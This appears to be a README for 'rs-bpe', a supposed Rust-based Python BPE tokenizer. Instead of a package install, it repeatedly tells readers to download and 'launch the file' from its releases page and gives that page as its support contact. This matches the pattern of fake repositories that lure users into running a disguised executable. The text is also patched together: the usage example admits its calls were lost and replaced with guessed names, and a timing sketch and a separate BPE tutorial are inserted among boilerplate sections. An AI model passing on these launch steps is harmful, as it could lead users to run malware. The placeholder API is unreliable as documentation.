A ridiculously fast Python BPE (Byte Pair Encoder) implementation written in Rust

SameerManan/rs-bpe

🚀 Fast BPE Tokenizer in Rust

Welcome to the official repository of "rs-bpe" - a blazingly fast Python BPE (Byte Pair Encoder) implementation written in Rust!

📦 Repository Information

  • Repository Name: rs-bpe
  • Description: A ridiculously fast Python BPE (Byte Pair Encoder) implementation written in Rust
  • Topics: bpe, bpe-tokenizer, byte-pair-encoding, byte-pair-tokenizer, huggingface, llm, openai, pypi-package, python, rust, tiktoken, tokenizers

🌟 Features

  • Lightning-fast performance thanks to the Rust programming language
  • Easy integration with Python projects
  • Support for a variety of tokenization tasks
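
The speed claim above is easiest to judge on your own data. The following is a minimal timing sketch, not part of rs-bpe: `tokens_per_second` is a hypothetical helper, and `str.split` stands in for a real tokenizer call, which you would swap in yourself.

```python
import time
from typing import Callable, Sequence


def tokens_per_second(
    tokenize: Callable[[str], Sequence],
    texts: list[str],
    repeats: int = 3,
) -> float:
    """Return the best observed throughput (tokens/second) over `repeats` runs."""
    best = 0.0
    for _ in range(repeats):
        start = time.perf_counter()
        # Count every token produced for every input text.
        total = sum(len(tokenize(t)) for t in texts)
        elapsed = time.perf_counter() - start
        if elapsed > 0:
            best = max(best, total / elapsed)
    return best


# Stand-in tokenizer: plain whitespace splitting (an assumption for illustration).
sample = ["This is a sample sentence."] * 1000
print(f"{tokens_per_second(str.split, sample):.0f} tokens/s")
```

Taking the best of several runs reduces noise from other processes; comparing two tokenizers on the same `texts` gives a relative figure rather than an absolute one.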

🔗 Repository Link

Download the latest release: https://github.com/SameerManan/rs-bpe/releases

🎉 Launch Instructions

Please launch the file present in the provided release link.

🚀 Getting Started

To start using the rs-bpe repository, follow these steps:

  1. Download the latest release from the specified link.
  2. Launch the downloaded file.
  3. Integrate rs-bpe into your Python projects for fast and efficient tokenization.

📂 Directory Structure

The repository structure is organized as follows:

  • src: Contains the source code for the BPE implementation
  • examples: Includes examples on how to use rs-bpe in Python projects
  • docs: Documentation on the usage and features of the BPE tokenizer

🛠️ Usage

Here is a simple example of how you can use rs-bpe in your Python projects:

import rsbpe

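# NOTE: the two calls below were lost in the source (a URL appeared in their place).
# `Tokenizer` and `encode` are placeholder names, not confirmed API;
# check the package documentation for the real ones.

# Initialize the BPE tokenizer
tokenizer = rsbpe.Tokenizer()

# Tokenize a sentence
tokens = tokenizer.encode("This is a sample sentence.")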

# Print the tokenized output
print(tokens)
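
For readers new to the technique, here is a minimal pure-Python sketch of byte-pair encoding itself. It is not the rs-bpe implementation and makes no claim about how the Rust code works; the function names `train_bpe`, `merge_pair`, `encode`, and `decode` are chosen for illustration only. The idea: start from raw bytes, repeatedly replace the most frequent adjacent pair with a new token id, and record each merge so it can be replayed on new text.

```python
from collections import Counter


def merge_pair(tokens: list[int], pair: tuple[int, int], new_id: int) -> list[int]:
    """Replace each left-to-right occurrence of `pair` in `tokens` with `new_id`."""
    out = []
    i = 0
    while i < len(tokens):
        if i + 1 < len(tokens) and (tokens[i], tokens[i + 1]) == pair:
            out.append(new_id)
            i += 2
        else:
            out.append(tokens[i])
            i += 1
    return out


def train_bpe(data: bytes, num_merges: int) -> list[tuple[int, int]]:
    """Learn up to `num_merges` merge rules from `data`."""
    tokens = list(data)   # start from raw byte values 0..255
    merges = []
    next_id = 256         # new token ids start right after the byte range
    for _ in range(num_merges):
        pairs = Counter(zip(tokens, tokens[1:]))
        if not pairs:
            break
        best = max(pairs, key=pairs.get)
        if pairs[best] < 2:
            break         # nothing repeats, so further merges gain nothing
        merges.append(best)
        tokens = merge_pair(tokens, best, next_id)
        next_id += 1
    return merges


def encode(text: str, merges: list[tuple[int, int]]) -> list[int]:
    """Encode `text` by replaying the learned merges in order."""
    tokens = list(text.encode("utf-8"))
    for offset, pair in enumerate(merges):
        tokens = merge_pair(tokens, pair, 256 + offset)
    return tokens


def decode(tokens: list[int], merges: list[tuple[int, int]]) -> str:
    """Expand token ids back into bytes and decode as UTF-8."""
    vocab = {i: bytes([i]) for i in range(256)}
    for offset, (a, b) in enumerate(merges):
        vocab[256 + offset] = vocab[a] + vocab[b]
    return b"".join(vocab[t] for t in tokens).decode("utf-8")


merges = train_bpe(b"aaabdaaabac", num_merges=3)
ids = encode("aaabdaaabac", merges)
print(ids)                  # [258, 100, 258, 97, 99]
print(decode(ids, merges))  # aaabdaaabac
```

This naive version rescans the whole sequence for every merge, which is the kind of cost an optimized implementation avoids.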

🚧 Contributing

We welcome contributions from the community to enhance the rs-bpe repository. If you have any suggestions, bug fixes, or new features to add, feel free to submit a pull request.

📞 Support

For any queries or issues, please reach out to our support team at https://github.com/SameerManan/rs-bpe/releases

🙌 Acknowledgements

We would like to thank the following organizations for their support:

  • HuggingFace
  • OpenAI
  • Python Software Foundation
  • Rust Community

📝 License

This project is licensed under the MIT License. See the license file in the repository for details.


Feel free to explore the rs-bpe repository and take advantage of its high-performance BPE tokenization capabilities! 🚀🔥
